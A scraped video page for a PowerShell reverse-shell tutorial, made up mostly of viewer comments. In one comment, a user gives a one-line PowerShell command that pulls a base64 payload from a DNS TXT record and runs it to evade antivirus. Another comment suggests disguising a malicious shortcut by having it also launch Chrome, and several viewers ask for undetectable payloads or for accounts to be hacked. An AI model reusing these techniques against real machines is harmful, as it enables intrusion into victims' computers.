Тёмный

PowerShell Hacking 

Loi Liang Yang
Подписаться 1,1 млн
Просмотров 70 тыс.
50% 1

// Membership //
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: / @loiliangyang
// Courses //
Full Ethical Hacking Course: www.udemy.com/course/full-web...
Full Web Ethical Hacking Course: www.udemy.com/course/full-web...
Full Mobile Hacking Course: www.udemy.com/course/full-mob...
// Books //
Kali Linux Hacking: amzn.to/3IUXaJv
Linux Basics for Hackers: amzn.to/3EzRPV6
The Ultimate Kali Linux Book: amzn.to/3m7cutD
// Social Links //
Website: www.loiliangyang.com
Facebook: / loiliangyang
Instagram: / loiliangyang
LinkedIn: / loiliangyang
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.

Наука

Опубликовано:

 

19 сен 2022

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 172   
@LLubdeRr
@LLubdeRr Год назад
Learned more about this topic in 8 min of this video than in two lessons with my teacher... thanks for that.
@scottbarker1337
@scottbarker1337 Год назад
Just found your channel and site, I cannot watch enough. Simply fantastic tutorials and rich explaination. 10/10
@exploit.6848
@exploit.6848 Год назад
Great power comes with great responsibility - Yes LOI sir
@skeeterwyh
@skeeterwyh Год назад
This will not work if the target PC didn’t download that file
@longlost8424
@longlost8424 Год назад
Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......
@tekklov2646
@tekklov2646 Год назад
So interesting..i use only CMD for running Scripts against the target Machine thanks for that Video ! ❤️
@YoloMoloPolo300
@YoloMoloPolo300 11 месяцев назад
Add to your PowerShell command to startup chrome as well. Target runs your shortcut, lets you in still see the chrome window that they were expecting.
@PaulMG
@PaulMG Год назад
Wow. Very interesting stuff. Very educative
@Pentestersploit
@Pentestersploit Год назад
Thanks alot for the tutorial very helpful
@waldemarfocht1564
@waldemarfocht1564 Год назад
I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here. 1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file. 2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this. 3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script. You have to be a little more imaginative. e.g. use base64 encoded script and work with -encodedcommand or use script blocks... It always works and I haven't seen an environment where it doesn't work: 1. Host a domain 2. Create TXT record with the base64 encoded script 3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]" In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell. So far I have not seen any EDR or AV solution that blocked this.
@SliderOverride
@SliderOverride Год назад
To funny he calls that hacking by downloading the script and run the Script it's not Hacker Loi, it's hacker "LOL"
@waldemarfocht1564
@waldemarfocht1564 Год назад
​@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them. In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.
@SliderOverride
@SliderOverride Год назад
@@waldemarfocht1564 like start Teamviewer and enter Id haha. It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction Then you can also download other executable files and run it with a script on your computer that's not hacking
@testtest-ez3mp
@testtest-ez3mp Год назад
thats smart, does this still work?
@waldemarfocht1564
@waldemarfocht1564 Год назад
@@testtest-ez3mp yeah it still works.
@calisrox4136
@calisrox4136 Год назад
daaamn, you best teacher hacker loi!!
@msmediascreenentertainment1951
Great, please make one video for automation with Excel
@tomasgorda
@tomasgorda Год назад
This look really nice, but could you do the same when you have av on, running defender and blocked using of IEX ? Like windows is normally working ?
@mysony1360
@mysony1360 Год назад
Can you please share your thoughts and knowledge about Windows Sandbox. If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox? Does is it protect for all kinds of threats? And, closing the sandbox, will this delete the infection, or it may stay in the system? Love your videos!!! Thanks a bunch!!
@sbeedfair9873
@sbeedfair9873 Год назад
thanks man you are great. you got a new subscriber :)
@respect444
@respect444 Год назад
Tq sir..... it's hackers world...... form Anonymous.
@Jeff_Got_Keys_Pranks
@Jeff_Got_Keys_Pranks Год назад
Love your programme
@arunbonthu3182
@arunbonthu3182 Год назад
good job male, thanks!
@darknode4791
@darknode4791 Год назад
Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only
@harshpanchal5878
@harshpanchal5878 Год назад
You never disappoint us, Always love your work 🙌🏻❤️
@jackofalltrades200
@jackofalltrades200 Год назад
Mind to make a video on how to evade this kind of Attack? Or even remove this shell file from your PC? Incase you noticed you got fused ?
@danygreen2967
@danygreen2967 Год назад
this is awesome i would like to be like you in the future .. :D
@troopsleader4066
@troopsleader4066 Год назад
plzz make a video on scada system
@bulluinvestment3649
@bulluinvestment3649 Год назад
LOVE💖💖💖💖from INDIA(ODISHA)
@GhostByteSoldier
@GhostByteSoldier 18 дней назад
thats all nice but what can we actaly do when we god the reverse shell
@F0SH
@F0SH Год назад
Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.
@sentient314
@sentient314 Год назад
Wow. This is some productive teaching shit
@aecreation8317
@aecreation8317 Год назад
First to like and comment 🔥🔥
@dr.wingkow3038
@dr.wingkow3038 11 месяцев назад
Good explanation.. By the way can you make tutorial "How To Exploit Pro Ftpd and Pure Ftpd with Metaslpoitable. Thanks before.
@amservis8050
@amservis8050 Год назад
yes..yes..perfect
@moujmast45
@moujmast45 Год назад
Best of the best
@krotson6767
@krotson6767 Год назад
Will any antivirus protect against this attack?
@Belkacemnotafraid
@Belkacemnotafraid Год назад
hello loiliang yang we want you to put vedio about the attiny 85 digispark
@hamzarashid7579
@hamzarashid7579 Год назад
I think the windwos defender is gonna pop up!!
@segdesc
@segdesc Год назад
How do you write on the screen?
@mara-uo1ob
@mara-uo1ob Год назад
Hi 👋 mr loh I need your advice i have 12 yrs Experience in sales marketing I want to do career conversion cyber security are you able to advise me.
@geekgoof7045
@geekgoof7045 Год назад
Any video on how to stop someone from accessing your device?
@shibuadak7419
@shibuadak7419 Год назад
sir please tell me how to create fund payload to bypass all av and crate it in .mp3 or .mp4 format. I need your help sir
@PetritK10
@PetritK10 Год назад
Can you make a video about AWS Hacking, like AWSGOAT project
@sushant7906
@sushant7906 Год назад
how I begin with hacking that I learn these type of things in details ?
@tchitchuJnr
@tchitchuJnr Год назад
i don't understand using 'hacking' word when you have direct access to a target and set it up how you need to get access to it
@onwongjan9621
@onwongjan9621 Год назад
Glad you said that becasue i wonder the same thing.. lol..
@felixkiprop48
@felixkiprop48 10 месяцев назад
Window Defender: "Am i a joke".
@mayhem1994
@mayhem1994 Год назад
love your videos aye
@jasveer2sgnr
@jasveer2sgnr Год назад
How to make spynote payload FUD?
@lazutozu2729
@lazutozu2729 Год назад
The great power comes the great responsibility
@judithsalva4433
@judithsalva4433 Год назад
Are we using PowerShell from linux vm or Windows vm?
@viralmoments8671
@viralmoments8671 Год назад
Good video
@SyedKamranAhmed
@SyedKamranAhmed Год назад
how to check our system is compromise or not.
@rferabel
@rferabel Год назад
Hello, I wish to learn cybersecurity and hacking at the same time, how can I go about it please. I have no knowledge about them
@airplanemode6353
@airplanemode6353 Год назад
Hey I wish you read my comment Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or RU-vid I actually find nothing or find a solution but it doesn't work
@jeremyrichardson24
@jeremyrichardson24 Год назад
If you had something like this running on your system would it show up on the output of netstat ?
@architech5940
@architech5940 4 месяца назад
Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.
@bluesky8589
@bluesky8589 Год назад
Hello, Are you available to chat offline about a project?
@mbauwuwofficial
@mbauwuwofficial Год назад
Hello sir, how remote access android with ip addres?
@hxd9321
@hxd9321 Год назад
Mr hacker Loi please do an iPhone reverse shell tutorial
@renatofreirefilho
@renatofreirefilho Год назад
Excelente Loi, como sempre muito bem explicado, continue com mais exemplos utilizando o powershell, são ótimos! Obrigado.
@viralmoments8671
@viralmoments8671 Год назад
I would like to buy hacking course
@jokarjapan
@jokarjapan Год назад
What about windows defender real-time protection if enabled ?
@architech5940
@architech5940 4 месяца назад
Doesn't work. You'll never get one of these powershell listeners to work on modern systems, not happening.
@WillSanchez1129
@WillSanchez1129 11 месяцев назад
Master loi I truly admire and respect the skill that you have and the work you put in to getting there. I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand
@t3chcs
@t3chcs Год назад
can it be possible that it doesnt work for me if i use a mobile hotspot as my internet?
@12335mohammad
@12335mohammad Год назад
ok do not forget to turn on real time and the firewall
@user-in9pm4sg6x
@user-in9pm4sg6x Год назад
that's why I disabled ability to run powershell for users
@bryanb3352
@bryanb3352 Год назад
Is any of this supposed to be surprising? Wow.. you're running powershell and downloading files. Crazy stuff.
@dreamkiller2693
@dreamkiller2693 Год назад
can you hack someone outside your network using this?
@theshyguy3
@theshyguy3 9 месяцев назад
every time i try this on my main and dummy computer my dummy computer running windows says it cant connect to the remote server. plz help
@firozajilani9316
@firozajilani9316 6 месяцев назад
How can I send shortcut file to any one. ??
@viralmoments8671
@viralmoments8671 Год назад
When we are chatting on whatsapp are something like that...
@code.islife493
@code.islife493 Год назад
Script kiddie: tries to install powercat. Windows defender: Pipe down little fella.
@maximadeti8009
@maximadeti8009 Год назад
Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.
@princesunil26k
@princesunil26k Месяц назад
My system been hacked like this what can i do now, please help me
@AdittaChakraborty321
@AdittaChakraborty321 6 месяцев назад
Goid❤❤
@devas3761
@devas3761 Год назад
Hello sir our company email address is getting spoffed please help me to fix this
@keremozcan4329
@keremozcan4329 Месяц назад
I just happened to notice 13 different powershell apps has opened on my computer and trying to find solution. Any helps? Am i under attack?
@chrisantusobogi8951
@chrisantusobogi8951 Год назад
Help me to know how to mod premium paid apps from Google playstore please 🙏🙏
@tamboleo
@tamboleo Год назад
So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?
@Themusicbiz
@Themusicbiz Год назад
Only for the 1337 h4x0rs
@some_random_wot_dude485
@some_random_wot_dude485 Год назад
Just plug an USB in every computer you have access to.
@DestoFlix
@DestoFlix Год назад
Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.
@dancer_queen642
@dancer_queen642 Год назад
Have you ever heard name of social engineering techniques?😏
@williamgomez6226
@williamgomez6226 Год назад
It helps you get into hacking very effectively!!!
@sushant7906
@sushant7906 Год назад
OMG ! I just do it. That's unbelievable 😶‍🌫😶‍🌫
@juanjo3002
@juanjo3002 Год назад
This works even with windows defender on?
@kolevv_6545
@kolevv_6545 Год назад
it should
@Themusicbiz
@Themusicbiz Год назад
Bro you don’t need to “slow down” but pauses after periods and commas would be nice. Sounds like one run on sentence
@user-xv7di2ew6q
@user-xv7di2ew6q Год назад
Please 🙏 make a tutorial about mobile Android hacking I'am so sad
@hxd9321
@hxd9321 Год назад
He already had
@KyleJCane
@KyleJCane Год назад
Hey hacker Lili why is sometimes metasploit is not working
@mynameis2110
@mynameis2110 Год назад
How
@fz7833
@fz7833 Год назад
In 3,2,1 boom
@user-jo4lp5ll4v
@user-jo4lp5ll4v Год назад
Where are you, did you go to the moon? ❤️
@IND_SUBODH_GAMING
@IND_SUBODH_GAMING Год назад
Dear sir make a video from wifi password cracked
@markortilla6149
@markortilla6149 Год назад
Hi
@dxddrb6557
@dxddrb6557 Год назад
That was confusing lol
@ajeerkhader3079
@ajeerkhader3079 Год назад
hell yeah. gonna make so sNice tutorialtty electronic soft and live up to my destiny as a trans woman LET'S GOOOOO
@NoGreedSeeds
@NoGreedSeeds Год назад
Mmmmm. Power Hell. 😂
@frojas26
@frojas26 Год назад
Wooooo!
@Elliottwavetheory6
@Elliottwavetheory6 Год назад
Sir , this is not fair you didn't tell us the main thing ( you know lot more ways than this scriptkiddi attacks)
@jackofalltrades200
@jackofalltrades200 Год назад
Ohhh! I think there's a malicious shell running on my PC because whenever I restart my PC I see a Quick she'll run a code and close.
@eddybash1342
@eddybash1342 Год назад
Run only linux !
@hereallweek
@hereallweek Год назад
You’re most likely fine that’s your computers bios booting up
@jackofalltrades200
@jackofalltrades200 Год назад
@@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit
@jackofalltrades200
@jackofalltrades200 Год назад
@@eddybash1342 what'd you mean? Run only Linux?
@lePoTo51
@lePoTo51 Год назад
Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility. What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand. And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...
@viralmoments8671
@viralmoments8671 Год назад
But you speak very speedy
@marshalldteach1109
@marshalldteach1109 Год назад
I'm here because of Uber :D
@arghya10000
@arghya10000 Год назад
😲😲😲😲 wow
@maxman126
@maxman126 Год назад
This is just jakobys payloads ....
@IamJakoby
@IamJakoby Год назад
Interesting huh 🤔
@howtodefeatgangstalking
@howtodefeatgangstalking Год назад
So we're just going to act like windows defender won't block this lol 😅
@hasashi_Aayu
@hasashi_Aayu Год назад
everything i do gets blocked by my antivirus lol so maybe we can't hack systems which have anti virus in it
@AbdullahDataVerse
@AbdullahDataVerse Год назад
😲😲
@AbdullahDataVerse
@AbdullahDataVerse Год назад
There is no telegram channel by this name
@CYBER-HERO
@CYBER-HERO Год назад
My nigga is here
@CHATGPTBESTMARKETING
@CHATGPTBESTMARKETING Год назад
Hi my boss how to hack any sellfunel
@samsepiol5137
@samsepiol5137 Год назад
and windows defender is a cucumber
@workout.trending
@workout.trending Год назад
bro can you hack a pc gamer and send it for me thank you 😃
@Naruto_Ep_tamil
@Naruto_Ep_tamil Год назад
Brother my gmail is hacked they changed every data please can you get it back please
@Naruto_Ep_tamil
@Naruto_Ep_tamil Год назад
What i do now explain please
@Naruto_Ep_tamil
@Naruto_Ep_tamil Год назад
Who can get it back my gmail plz
Далее
Remotely Control Any Phone and PC with this Free tool!
17:15
КОРОЧЕ ГОВОРЯ, ШКОЛА БУДУЩЕГО
10:40
HOW DID SHE WIN??
00:49
Просмотров 15 млн
Can We Save Goku In 5 SECONDS⁉️😰 #dbz #goku
00:15
Fileless Ransomware: Powershell Netwalker
7:22
Просмотров 64 тыс.
Remotely Control Any PC with an image?!
12:42
Просмотров 139 тыс.
How Hackers Move Through Networks (with Ligolo)
20:01
Просмотров 256 тыс.
Игровой Комп с Авито за 4500р
1:00
Сложная распаковка iPhone 15
1:01
Просмотров 12 тыс.